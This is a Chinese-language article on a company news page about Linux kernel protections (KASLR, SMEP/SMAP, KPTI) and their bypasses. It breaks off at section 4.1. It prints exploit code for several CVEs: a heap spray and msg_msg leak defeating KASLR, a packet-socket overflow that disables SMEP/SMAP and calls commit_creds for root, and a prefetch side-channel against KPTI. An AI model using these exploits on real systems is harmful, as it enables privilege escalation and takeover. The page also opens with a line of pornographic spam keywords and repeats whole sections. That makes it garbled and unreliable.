日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
Linux內(nèi)核常用保護(hù)和繞過技術(shù)

1 內(nèi)核是什么?

內(nèi)核是操作系統(tǒng)的核心部分。內(nèi)核負(fù)責(zé)管理計(jì)算機(jī)的硬件資源,并實(shí)現(xiàn)操作系統(tǒng)的基本功能。內(nèi)核是操作系統(tǒng)中最重要的部分,它是操作系統(tǒng)與硬件之間的橋梁。內(nèi)核可以被看作是操作系統(tǒng)的“心臟”,負(fù)責(zé)控制和管理計(jì)算機(jī)系統(tǒng)的所有硬件和軟件資源。不同的操作系統(tǒng)有不同的內(nèi)核,比如Linux操作系統(tǒng)有Linux內(nèi)核,Linux內(nèi)核是Linux操作系統(tǒng)的核心部分,它是由C語言編寫的程序,并且是一個(gè)開源軟件,它的源代碼可以自由下載和修改。Linux內(nèi)核提供了多種功能,包括內(nèi)存管理、進(jìn)程管理、文件系統(tǒng)支持、網(wǎng)絡(luò)通信等,Linux內(nèi)核的設(shè)計(jì)具有高度的可擴(kuò)展性和靈活性,可以應(yīng)對(duì)各種應(yīng)用場(chǎng)景和硬件平臺(tái)。

創(chuàng)新互聯(lián)專業(yè)為企業(yè)提供吉利網(wǎng)站建設(shè)、吉利做網(wǎng)站、吉利網(wǎng)站設(shè)計(jì)、吉利網(wǎng)站制作等企業(yè)網(wǎng)站建設(shè)、網(wǎng)頁設(shè)計(jì)與制作、吉利企業(yè)網(wǎng)站模板建站服務(wù),十多年吉利做網(wǎng)站經(jīng)驗(yàn),不只是建網(wǎng)站,更提供有價(jià)值的思路和整體網(wǎng)絡(luò)服務(wù)。

2 內(nèi)核漏洞

有代碼就有漏洞,內(nèi)核也不例外。內(nèi)核漏洞是操作系統(tǒng)內(nèi)核中的存在的安全漏洞,這些漏洞可能導(dǎo)致系統(tǒng)被惡意軟件入侵或攻擊者控制,并可能造成數(shù)據(jù)泄露、系統(tǒng)癱瘓等嚴(yán)重后果。例如:攻擊者可能會(huì)利用內(nèi)核漏洞來繞過系統(tǒng)安全保護(hù),提升權(quán)限,從而獲取用戶敏感信息,或者在系統(tǒng)中安裝惡意軟件,損壞系統(tǒng)數(shù)據(jù)或癱瘓整個(gè)系統(tǒng)。著名漏洞“dirty cow”(臟牛漏洞)影響之廣,從2007年到2018年之間的所有發(fā)行版都受其影響,讓全世界數(shù)百萬臺(tái)設(shè)備暴露在威脅當(dāng)中。

如圖為近10年漏洞報(bào)送數(shù)量,表中可知Linux內(nèi)核漏洞數(shù)量一直處于高位,基本每年在100以上,尤其2017年漏洞數(shù)量最多,達(dá)到449個(gè)之多。

因此及時(shí)發(fā)現(xiàn),修復(fù)內(nèi)核漏洞非常重要。通常,操作系統(tǒng)廠商會(huì)定期發(fā)布補(bǔ)丁來修復(fù)內(nèi)核漏洞。同時(shí)為了減小漏洞發(fā)現(xiàn)造成的危害,Linux內(nèi)核采用了多種技術(shù)來提高漏洞利用的難度來保護(hù)系統(tǒng)安全。例如:SMEP保護(hù)、SMAP保護(hù)、KASLR保護(hù)、KPTI保護(hù)。但即使是這么多保護(hù),也無法安全保護(hù)內(nèi)核,漏洞可以輕松繞過這些保護(hù),達(dá)到提權(quán)效果。下面介紹這些年出現(xiàn)Linux內(nèi)核保護(hù)技術(shù)以及針對(duì)這些保護(hù)技術(shù)的繞過方法。

3 Linux內(nèi)核保護(hù)與繞過

3.1 KASLR 保護(hù)

struct seq_operations {
  void * (*start) (struct seq_file *m, loff_t *pos);
  void (*stop) (struct seq_file *m, void *v);
  void * (*next) (struct seq_file *m, void *v, loff_t *pos);
  int (*show) (struct seq_file *m, void *v);
};

利用seq_operations泄露內(nèi)核基地址:堆噴大量 seq_operations (open("/proc/self/stat",O_RDONLY)) ,溢出篡改msg_msg->m_ts的值,從而泄露基地址。

  • 準(zhǔn)備 fs_context 漏洞對(duì)象;
int call_fsopen(){
    int fd = fsopen("ext4",0);
    if(fd <0){
        perror("fsopen");
        exit(-1);
    }
    return fd;
}
  • 往kmalloc-32堆噴seq_operations對(duì)象;
for(int i=0;i<100;i++){
        open("/proc/self/stat",O_RDONLY);
    }
  • 創(chuàng)建大量msg_msg消息(大小為0xfe8),會(huì)將輔助消息分配在kmalloc-32
  • 觸發(fā)kmalloc-4096溢出,修改msg_msg->m_ts;
char tiny_evil[] = "DDDDDD\x60\x10";
    fsconfig(fd,FSCONFIG_SET_STRING,"CCCCCCCC",tiny,0);
    fsconfig(fd,FSCONFIG_SET_STRING,"\x00",tiny_evil,0);
  • 利用msg_msg越界讀,泄露內(nèi)核指針。
get_msg(targets[i],received,size,0,IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
  printf("[*] received 0x%lx\n", kbase);

泄露出基地址后,可根據(jù)偏移計(jì)算任何內(nèi)核函數(shù)地址達(dá)到提權(quán)。

3 Linux內(nèi)核保護(hù)與繞過

3.1 KASLR 保護(hù)

linux內(nèi)核(2005年)開始支持KASLR。KASLR(Kernel Address Space Layout Randomization)是一種用于保護(hù)操作系統(tǒng)內(nèi)核的安全技術(shù)。它通過在系統(tǒng)啟動(dòng)時(shí)隨機(jī)化內(nèi)核地址空間的布局來防止攻擊者確定內(nèi)核中的精確地址。即使攻擊者知道了一些內(nèi)核代碼的位置,也無法精確定位內(nèi)核中的其他代碼和數(shù)據(jù),從而繞過系統(tǒng)安全保護(hù)。在實(shí)現(xiàn)時(shí)主要通過改變?cè)裙潭ǖ膬?nèi)存布局來提升內(nèi)核安全性,因此在代碼實(shí)現(xiàn)過程中,kaslr與內(nèi)存功能存在比較強(qiáng)的耦合關(guān)系。

隨機(jī)化公式: 函數(shù)基地址 +隨機(jī)值=內(nèi)存運(yùn)行地址

比如先查看 entry_SYSCALL_64函數(shù)的基地址為 0xffffffff82000000

它運(yùn)行時(shí)的內(nèi)存地址為0xffffffff8fa00000

將運(yùn)行地址減函數(shù)基地址得到隨機(jī)值變量0xda00000(0xffffffff8fa00000-0xffffffff82000000=0xda00000) ,這0xda0000就是隨機(jī)值,每次系統(tǒng)啟動(dòng)的時(shí)候都會(huì)發(fā)生變化。

在有kaslr保護(hù)的情況下,漏洞觸發(fā)要跳轉(zhuǎn)到指定的函數(shù)位置時(shí),由于隨機(jī)值的存在,無法確定函數(shù)在內(nèi)存中的具體位置,如果要利用就需要預(yù)先知道目標(biāo)函數(shù)地址以及shellcode存放在內(nèi)存中的地址,這使得漏洞利用比較困難。

針對(duì)這種保護(hù)技術(shù),目前比較常規(guī)的繞過方法是利用漏洞泄露出內(nèi)核中某些結(jié)構(gòu)體,通過上面計(jì)算方法算出內(nèi)核基地址,有了基地址后就可以計(jì)算想要的函數(shù)地址了。

如CVE-2022-0185,是一個(gè)提權(quán)漏洞,漏洞成因是 len > PAGE-2-size 整數(shù)溢出導(dǎo)致判斷錯(cuò)誤,后面繼續(xù)拷貝造成堆溢出。

diff --git a/fs/fs_context.c b/fs/fs_context.c
index b7e43a780a625..24ce12f0db32e 100644
--- a/fs/fs_context.c
+++ b/fs/fs_context.c
@@ -548,7 +548,7 @@ static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
            param->key);
  }
 
-  if (len > PAGE_SIZE - 2 - size)    //這里存在整數(shù)溢出,后面的拷貝會(huì)造成堆溢出
+  if (size + len + 2 > PAGE_SIZE)
    return invalf(fc, "VFS: Legacy: Cumulative options too large");
  if (strchr(param->key, ',') ||
      (param->type == fs_value_is_string &&

函數(shù)調(diào)用路徑:_x64_sys_fsconfig() ---> vfs_fsconfig_locked()-->vfs_parse_fs_param()-->legacy_parse_param(),vfs_parse_fs_param()中的函數(shù)指針定義在legacy_fs_context_ops函數(shù)表中,在alloc_fs_context()函數(shù)中完成filesystem context結(jié)構(gòu)的分配和初始化。

在legacy_parse_param 函數(shù):linux5.11/fs/fs_context.c: legacy_parse_param

static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
   struct legacy_fs_context *ctx = fc->fs_private;
   unsigned int size = ctx->data_size;
   size_t len = 0;

   ··· ···
   ··· ···
   switch (param->type) {
   case fs_value_is_string:
      len = 1 + param->size;
      fallthrough;
   ··· ···
   }

   if (len > PAGE_SIZE - 2 - size) //--此處邊界檢查有問題
      return invalf(fc, "VFS: Legacy: Cumulative options too large");
   if (strchr(param->key, ',') ||
       (param->type == fs_value_is_string &&
        memchr(param->string, ',', param->size)))
      return invalf(fc, "VFS: Legacy: Option '%s' contained comma",
               param->key);
   if (!ctx->legacy_data) {
      ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL); //在第一次時(shí)會(huì)分配一頁大小
      if (!ctx->legacy_data)
         return -ENOMEM;
   }

   ctx->legacy_data[size++] = ',';
   len = strlen(param->key);
   memcpy(ctx->legacy_data + size, param->key, len);
   size += len;
   if (param->type == fs_value_is_string) {
      ctx->legacy_data[size++] = '=';
      memcpy(ctx->legacy_data + size, param->string, param->size); //拷貝,存在越界
      size += param->size;
   }
   ctx->legacy_data[size] = '\0';
   ctx->data_size = size;
   ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;
   return 0;
}

(len > PAGE_SIZE - 2 - size )判斷處有問題,根據(jù)符號(hào)優(yōu)先級(jí) ”-“的優(yōu)先級(jí)是4,”>" 的優(yōu)先級(jí)是6,所以先執(zhí)行右邊模塊。又因?yàn)閿?shù)據(jù)類型自動(dòng)轉(zhuǎn)換原則,"PAGE_SIZE-2-size" 轉(zhuǎn)換為無符號(hào)進(jìn)行運(yùn)算。size變量由用戶空間傳入,當(dāng)size的值大于“PAGE_SIZE-2”的差值時(shí),運(yùn)算產(chǎn)生溢出。后面拷貝時(shí),size是大于kmalloc申請(qǐng)的“PAGE_SIZE - 2”大小。在memcpy(ctx->legacy_data + size, param->string, param->size); 這個(gè)位置,導(dǎo)致溢出。

legacy_parse_param函數(shù)是處理文件系統(tǒng)掛載過程中的一些功能,所以對(duì)這個(gè)漏洞的利用,不同磁盤格式利用方式也不一樣,這里我們?cè)趀xt4磁盤格式下,了解一下其漏洞利用過程。首先fsopen打開一個(gè)文件系統(tǒng)環(huán)境,用戶可以用來mount新的文件系統(tǒng)。 fsconfig()調(diào)用能讓我們往 ctx->legacy_data寫入一個(gè)新的(key,valu),ctx->legacy_data指向一個(gè)4096字節(jié)的緩沖區(qū)(首次配置文件系統(tǒng)時(shí)就分配)。 len > PAGE_SIZE-2-size , len是將要寫的長(zhǎng)度,PAGE_SIZE == 4096, size是已寫的長(zhǎng)度,2字節(jié)表示一個(gè)逗號(hào)和一個(gè)NULL終止符。當(dāng)size是unsigned int(總是被當(dāng)作正值),會(huì)導(dǎo)致整數(shù)溢出,如果相減的結(jié)果小于0,還是被包裝成正值。執(zhí)行117次后添加長(zhǎng)度為0的key和長(zhǎng)度為33的value,最終的size則為(117*(33+2))4095,這樣PAGE_SIZE-2-size-1==18446744073709551615 ,這樣無論len多大都能滿足條件。可以設(shè)置為"\x00",這樣逗號(hào)會(huì)寫入偏移4095,等號(hào)寫入下給kmalloc-4096d 偏移0處,接著就能往偏移1處開始往后寫value。

針對(duì)這個(gè)漏洞,我們可以利用seq_operations結(jié)構(gòu)體泄露內(nèi)核基地址從而繞過KASLR,seq_operations 是一個(gè)大小為0x20的結(jié)構(gòu)體,在打開/proc/self/stat會(huì)申請(qǐng)出來。里面定義了四個(gè)函數(shù)指針,通過他們可以泄露出內(nèi)核基地址。

struct seq_operations {
  void * (*start) (struct seq_file *m, loff_t *pos);
  void (*stop) (struct seq_file *m, void *v);
  void * (*next) (struct seq_file *m, void *v, loff_t *pos);
  int (*show) (struct seq_file *m, void *v);
};

利用seq_operations泄露內(nèi)核基地址:堆噴大量 seq_operations (open("/proc/self/stat",O_RDONLY)) ,溢出篡改msg_msg->m_ts的值,從而泄露基地址。

  • 準(zhǔn)備 fs_context 漏洞對(duì)象;
int call_fsopen(){
    int fd = fsopen("ext4",0);
    if(fd <0){
        perror("fsopen");
        exit(-1);
    }
    return fd;
}
  • 往kmalloc-32堆噴seq_operations對(duì)象;
for(int i=0;i<100;i++){
        open("/proc/self/stat",O_RDONLY);
    }
  • 創(chuàng)建大量msg_msg消息(大小為0xfe8),會(huì)將輔助消息分配在kmalloc-32
  • 觸發(fā)kmalloc-4096溢出,修改msg_msg->m_ts;
char tiny_evil[] = "DDDDDD\x60\x10";
    fsconfig(fd,FSCONFIG_SET_STRING,"CCCCCCCC",tiny,0);
    fsconfig(fd,FSCONFIG_SET_STRING,"\x00",tiny_evil,0);
  • 利用msg_msg越界讀,泄露內(nèi)核指針。
get_msg(targets[i],received,size,0,IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
  printf("[*] received 0x%lx\n", kbase);

泄露出基地址后,可根據(jù)偏移計(jì)算任何內(nèi)核函數(shù)地址達(dá)到提權(quán)。

3.2 SMEP&SMAP保護(hù)

linux內(nèi)核從3.0(2011年8月)開始支持SMEP,3.7(2012年12月)開始支持SMAP。SMEP(Supervisor Mode Execution Protection)是一種用于保護(hù)操作系統(tǒng)內(nèi)核安全的技術(shù)。它通過在CPU開一個(gè)比特位,來限制內(nèi)核態(tài)訪問用戶態(tài)的代碼。當(dāng)有了內(nèi)核的控制權(quán)去執(zhí)行用戶態(tài)中的shellcode,CPU會(huì)拒絕執(zhí)行該操作,并向操作系統(tǒng)發(fā)出一個(gè)異常中斷。這樣,即使攻擊者成功執(zhí)行了惡意代碼,也無法繞過系統(tǒng)安全保護(hù)訪問,從而大大增強(qiáng)了系統(tǒng)的安全性。根據(jù)CR4寄存器的值判斷是否開啟smep保護(hù),當(dāng)CR4寄存器的第20位是1時(shí),保護(hù)開啟,為0時(shí),保護(hù)關(guān)閉。

SMAP(Supervisor Mode Access Protection)是一種用于保護(hù)操作系統(tǒng)內(nèi)核的安全技術(shù)。它與SMEP相似,都在CPU中開啟一個(gè)比特位來限制內(nèi)核態(tài)訪問用戶態(tài)的能力。它使用戶態(tài)的指針無法被內(nèi)核態(tài)解引用。這樣即使攻擊者成功執(zhí)行了惡意代碼,也無法繞過系統(tǒng)安全保護(hù)讀取內(nèi)核空間中的敏感信息。判斷CR4寄存器的值來確定是否開啟,當(dāng)CR4寄存器的值第21位是1時(shí),SMAP開啟。

針對(duì)SMEP、SMAP保護(hù)時(shí),一般是通過漏洞修改寄存器關(guān)閉保護(hù),達(dá)到繞過保護(hù)的目的。比如可以通過獲得內(nèi)核基地址后算出native_write_cr4函數(shù)在內(nèi)存運(yùn)行時(shí)地址,控制PC跳轉(zhuǎn)到native_write_cr4函數(shù)去覆寫CR4寄存器的20位和21位關(guān)閉保護(hù),CPU只是判斷CR4寄存器的20位21位的值,只要為0零就能關(guān)閉保護(hù),同樣也可以使用ROP的方式在內(nèi)核鏡像中尋找ROP組合出能修改cr4寄存器的鏈。

CVE-2017-7308漏洞,是內(nèi)核套接字中的packet_set_ring()函數(shù)沒有正確檢測(cè)size,長(zhǎng)度判斷條件錯(cuò)誤,導(dǎo)致堆溢出。

static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
        int closing, int tx_ring){
    ...
    if (po->tp_version >= TPACKET_V3 &&
                (int)(req->tp_block_size -
                  BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
                goto out;
    ...
}

判斷內(nèi)存塊頭部加上每個(gè)內(nèi)存塊私有數(shù)據(jù)的大小不超過內(nèi)存塊自身的大小,保證內(nèi)存中有足夠的空間。當(dāng)req_u->req3.tp_sizeof_priv 接近unsigned int 的最大值時(shí),這個(gè)判斷就會(huì)被繞過。隨后代碼執(zhí)行到init_prb_bdqc函數(shù)處創(chuàng)建環(huán)形緩沖區(qū)。

static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
        int closing, int tx_ring){

    ...
        order = get_order(req->tp_block_size);   // 內(nèi)核頁的階
        pg_vec = alloc_pg_vec(req, order);  // 在某個(gè)階上取一頁
        if (unlikely(!pg_vec))
            goto out;
        // 創(chuàng)建一個(gè)接收數(shù)據(jù)包的TPACKET_V3環(huán)形緩沖區(qū)。 
        switch (po->tp_version) {
            case TPACKET_V3:
            /* Transmit path is not supported. We checked
             * it above but just being paranoid
             */
            if (!tx_ring)
                init_prb_bdqc(po, rb, pg_vec, req_u);
                    break;
        default:
            break;
    ...
}

在init_prb_bdqc函數(shù)中,req_u->req3.tp_sizeof_priv(unsigned int)賦值給了p1->blk_sizeof_priv(unsigned short),被分割成低位字節(jié)。因?yàn)閠p_sizeof_priv可控,所以blk_sizeof_priv也可控。

static void init_prb_bdqc(struct packet_sock *po,
      struct packet_ring_buffer *rb,
      struct pgv *pg_vec,
      union tpacket_req_u *req_u)
{
  struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
  struct tpacket_block_desc *pbd;
  ...
  p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;
  p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);  
  prb_init_ft_ops(p1, req_u);
  prb_setup_retire_blk_timer(po);
  prb_open_block(p1, pbd);  //初始化第一個(gè)內(nèi)存塊
}

因?yàn)閎lk_sizeof_priv可控,進(jìn)而可以間接控制max_frame_len的值,該值是最大幀范圍,控制max_frame_len的值超過實(shí)際幀大小,當(dāng)內(nèi)核接收數(shù)據(jù)包即可繞大小檢測(cè)。

static void prb_open_block(struct tpacket_kbdq_core *pkc1,
  struct tpacket_block_desc *pbd1)
{
  struct timespec ts;
  struct tpacket_hdr_v1 *h1 = &pbd1->hdr.bh1;
  ...
  pkc1->pkblk_start = (char *)pbd1;                    
  pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);
  BLOCK_O2FP(pbd1) = (__u32)BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);    
  BLOCK_O2PRIV(pbd1) = BLK_HDR_LEN;
  ...
}

判斷內(nèi)存塊頭部加上每個(gè)內(nèi)存塊私有數(shù)據(jù)的大小不超過內(nèi)存塊自身的大小,保證內(nèi)存中有足夠的空間。當(dāng)req_u->req3.tp_sizeof_priv 接近unsigned int 的最大值時(shí),這個(gè)判斷就會(huì)被繞過。隨后代碼執(zhí)行到init_prb_bdqc函數(shù)處創(chuàng)建環(huán)形緩沖區(qū)。

...
    order = get_order(req->tp_block_size);   // 內(nèi)核頁的階
    pg_vec = alloc_pg_vec(req, order);  // 在某個(gè)階上取一頁
    if (unlikely(!pg_vec))
        goto out;
    // 創(chuàng)建一個(gè)接收數(shù)據(jù)包的TPACKET_V3環(huán)形緩沖區(qū)。 
    switch (po->tp_version) {
        case TPACKET_V3:
        /* Transmit path is not supported. We checked
         * it above but just being paranoid
         */
        if (!tx_ring)
            init_prb_bdqc(po, rb, pg_vec, req_u);
                break;
    default:
        break;
...

在init_prb_bdqc函數(shù)中,req_u->req3.tp_sizeof_priv(unsigned int)賦值給了p1->blk_sizeof_priv(unsigned short),被分割成低位字節(jié)。因?yàn)閠p_sizeof_priv可控,所以blk_sizeof_priv也可控。

static void init_prb_bdqc(struct packet_sock *po,
      struct packet_ring_buffer *rb,
      struct pgv *pg_vec,
      union tpacket_req_u *req_u)
{
  struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
  struct tpacket_block_desc *pbd;
  ...
  p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;
  p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);  
  prb_init_ft_ops(p1, req_u);
  prb_setup_retire_blk_timer(po);
  prb_open_block(p1, pbd);  //初始化第一個(gè)內(nèi)存塊
}

因?yàn)閎lk_sizeof_priv可控,進(jìn)而可以間接控制max_frame_len的值,該值是最大幀范圍,控制max_frame_len的值超過實(shí)際幀大小,當(dāng)內(nèi)核接收數(shù)據(jù)包即可繞大小檢測(cè)。

static void prb_open_block(struct tpacket_kbdq_core *pkc1,
  struct tpacket_block_desc *pbd1)
{
  struct timespec ts;
  struct tpacket_hdr_v1 *h1 = &pbd1->hdr.bh1;
  ...
  pkc1->pkblk_start = (char *)pbd1;                    
  pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);
  BLOCK_O2FP(pbd1) = (__u32)BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);    
  BLOCK_O2PRIV(pbd1) = BLK_HDR_LEN;
  ...
}

nxt_offset是寫入內(nèi)存塊的偏移量。通過pkc1->blk_sizeof_priv間接控nxt_offset。從packet_set_ring函數(shù)繞過檢測(cè)開始,后面的最大值以及寫入偏移都可控,所以可以利用溢出修改SMEP和SMAP保護(hù)。

利用思路首先創(chuàng)建一個(gè)環(huán)形緩沖區(qū),再在某個(gè)環(huán)形緩沖區(qū)內(nèi)存后面分配一個(gè)packet_sock對(duì)象,將接收環(huán)形緩沖區(qū)附加到packet_sock對(duì)象,溢出它,覆蓋prb_bdqc->retire_blk_timer字段,使得retire_blk_timer->func指向native_write_cr4函數(shù),retire_blk_timer->data 設(shè)置覆蓋值,等待計(jì)時(shí)器執(zhí)行func后關(guān)閉SMEP和SMAP。native_write_cr4函數(shù)是內(nèi)核4.x版本的內(nèi)置inline匯編函數(shù),主要用來修改CR4寄存器的。

堆分配512個(gè) socket對(duì)象

void kmalloc_pad(int count) {
 
    for(int i=0;i<512;i++){
        if(socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP))==-1)
            printf("[-] socket err\n");
            exit(-1);
    }
}

頁分配1024個(gè)頁

void pagealloc_pad(int count){
   packet_socket(0x8000,2048,count,0,100);
}

int packet_socket(unsigned int block_size, unsigned int frame_size,
      unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
   int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
   if (s < 0) {
      printf("[-] socket err\n");
      exit(-1);
   }

   packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
      sizeof_priv, timeout);

   struct sockaddr_ll sa;
   memset(&sa, 0, sizeof(sa));
   sa.sll_family = PF_PACKET;
   sa.sll_protocol = htons(ETH_P_ALL);
   sa.sll_ifindex = if_nametoindex("lo");   //網(wǎng)絡(luò)接口
   sa.sll_hatype = 0;
   sa.sll_pkttype = 0;
   sa.sll_halen = 0;

   int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
   if (rv < 0) {
      printf("[-] bind err\n");
      exit(-1);
   }

   return s;
}

void packet_socket_rx_ring_init(int s, unsigned int block_size,
      unsigned int frame_size, unsigned int block_nr,
      unsigned int sizeof_priv, unsigned int timeout) {
   int v = TPACKET_V3;
   int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
   if (rv < 0) {
      printf("[-] setsockopt err\n");
      exit(-1);
   }

   struct tpacket_req3 req;
   memset(&req, 0, sizeof(req));
   req.tp_block_size = block_size;      
   req.tp_frame_size = frame_size;
   req.tp_block_nr = block_nr;
   req.tp_frame_nr = (block_size * block_nr) / frame_size;
   req.tp_retire_blk_tov = timeout;
   req.tp_sizeof_priv = sizeof_priv;   
   req.tp_feature_req_word = 0;

   // 創(chuàng)建PACKET_RX_RING 的環(huán)形緩沖區(qū)
   rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
   if (rv < 0) {
      printf("[-] setsockopt err\n");
      exit(-1);
   }
}

執(zhí)行關(guān)閉SMEP和SMAP保護(hù)

void oob_timer_execute(void *func, unsigned long arg) {
    // 構(gòu)造溢出堆
    oob_setup(2048 + TIMER_OFFSET - 8);

    int i;
    for (i = 0; i < 32; i++) {
        // 環(huán)形緩沖區(qū)后面創(chuàng)建 packet_sockt 對(duì)象
        int timer = packet_sock_kmalloc();
        // 附加到packet_sockt對(duì)象后面,設(shè)置計(jì)時(shí)器時(shí)間
        packet_sock_timer_schedule(timer, 1000);
    }

    char buffer[2048];
    memset(&buffer[0], 0, sizeof(buffer));

    struct timer_list *timer = (struct timer_list *)&buffer[8];
    timer->function = func;        // 為 native_write_cr4  函數(shù)地址
    timer->data = arg;
    timer->flags = 1;

    // 發(fā)送數(shù)據(jù)包到接收環(huán)形緩沖區(qū)上,溢出環(huán)形緩沖區(qū)的retire_blk_timer->func,并等待計(jì)時(shí)器執(zhí)行
    oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);

    sleep(1);
}

// 為了構(gòu)造堆溢出,計(jì)算到 retire_blk_timer 的偏移值
int oob_setup(int offset) {
    unsigned int maclen = ETH_HDR_LEN;
    unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +
                (maclen < 16 ? 16 : maclen));
    unsigned int macoff = netoff - maclen;
    unsigned int sizeof_priv = (1u<<31) + (1u<<30) +
        0x8000 - BLK_HDR_LEN - macoff + offset;
    return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);
}

溢出xmit字段,指向用戶空間的申請(qǐng)的commit_creds(prepare_kernel_cred(0)) 函數(shù)獲得root。

int ps[32];

int i;
for (i = 0; i < 32; i++)
  ps[i] = packet_sock_kmalloc();  //創(chuàng)建 packet_sockt 對(duì)象

char buffer[2048];
memset(&buffer[0], 0, 2048);

void **xmit = (void **)&buffer[64];  
*xmit = func;  // 用戶空間的commit_creds(prepare_kernel_cred(0))函數(shù)

// 溢出寫入packet_sock->xmit處
oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);

for (i = 0; i < 32; i++)
  packet_sock_id_match_trigger(ps[i]);  // 發(fā)送數(shù)據(jù)包到 packet_sockt對(duì)象上,執(zhí)行xmit

3.3 KPTI保護(hù)

linux內(nèi)核從4.15(2018年-2月)開始支持KPTI。KPTI(kernel page-table isolation, 內(nèi)核頁表隔離,也稱PTI)是Linux內(nèi)核中的一種強(qiáng)化技術(shù),旨在更好地隔離用戶空間與內(nèi)核空間的內(nèi)存來提高安全性,緩解現(xiàn)代x86 CPU中的“熔毀”硬件安全缺陷。KPTI通過完全分離用戶空間與內(nèi)核空間頁表來解決頁表泄露。一旦開啟了 KPTI,由于內(nèi)核態(tài)和用戶態(tài)的頁表不同,所以如果使用 ret2user或內(nèi)核執(zhí)行 ROP返回用戶態(tài)時(shí),由于內(nèi)核態(tài)無法確定用戶態(tài)的頁表,就會(huì)報(bào)出一個(gè)段錯(cuò)誤。

針對(duì)這種保護(hù)方式,主流是通過signal函數(shù)和KPTI trampoline方法,近段時(shí)間一個(gè)新的思路,通過側(cè)信道泄露內(nèi)存地址,從而繞過KPTI保護(hù),執(zhí)行指定代碼。

CVE-2022-4543 漏洞繞過帶有KPTI的保護(hù),通過預(yù)取側(cè)信道找到entry_SYSCALL_64的地址,并且它與__entry_text_start和其他部分一起隨機(jī)化。思路是重復(fù)多次執(zhí)行系統(tǒng)調(diào)用以確保頁上有緩存指令在TLB中,然后預(yù)取側(cè)信道處理程序的可能選定范圍(如0xffffffff80000000-0xffffffffc0000000)。TLB( 虛擬到物理地址轉(zhuǎn)換的緩存機(jī)制)。x86_64有一組預(yù)取指令RDTSC,這些指令將地址“預(yù)取”到 CPU 緩存中。如果正在加載的地址已存在于 TLB 中,則預(yù)取將快速完成,但當(dāng)?shù)刂凡淮嬖跁r(shí),預(yù)取將完成得較慢(并且需要完成頁表遍歷)。

for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++)
    {
        for (uint64_t idx = 0; idx < ARR_SIZE; idx++)
        {
            uint64_t test = SCAN_START + idx * STEP;
            syscall(104);  // 多次調(diào)用,確保緩存指令在TLB中
            uint64_t time = sidechannel(test);  // 預(yù)取
            if (i >= DUMMY_ITERATIONS)
                data[idx] += time;
        }
    }

uint64_t sidechannel(uint64_t addr) {
  uint64_t a, b, c, d;
  asm volatile (".intel_syntax noprefix;"
    "mfence;"
    "rdtscp;"
    "mov %0, rax;"
    "mov %1, rdx;"
    "xor rax, rax;"
    "lfence;"
    "prefetchnta qword ptr [%4];"
    "prefetcht2 qword ptr [%4];"
    "xor rax, rax;"
    "lfence;"
    "rdtscp;"
    "mov %2, rax;"
    "mov %3, rdx;"
    "mfence;"
    ".att_syntax;"
    : "=r" (a), "=r" (b), "=r" (c), "=r" (d)
    : "r" (addr)
    : "rax", "rbx", "rcx", "rdx");
  a = (b << 32) | a;
  c = (d << 32) | c;
  return c - a;
}

普通用戶權(quán)限側(cè)信道繞過帶有給KPTI保護(hù)。

4 新內(nèi)核漏洞利用方法

由于內(nèi)核保護(hù)的手段日益增多,傳統(tǒng)的漏洞利用方法也越來越困難,所以安全研究者在研究一些新的漏洞利用方法。新的利用方法可以不關(guān)注上面的保護(hù),如果漏洞品相好可以直接繞過保護(hù)達(dá)到內(nèi)核任意地址讀寫。如:CVE-2022-0847 它因splice函數(shù)映射文件時(shí)沒有重置pipe中的flag標(biāo)志,導(dǎo)致緩存頁越權(quán)寫入內(nèi)容,利用該漏洞可在root權(quán)限文件中寫入提權(quán)腳本。

4.1 pipe管道技術(shù)

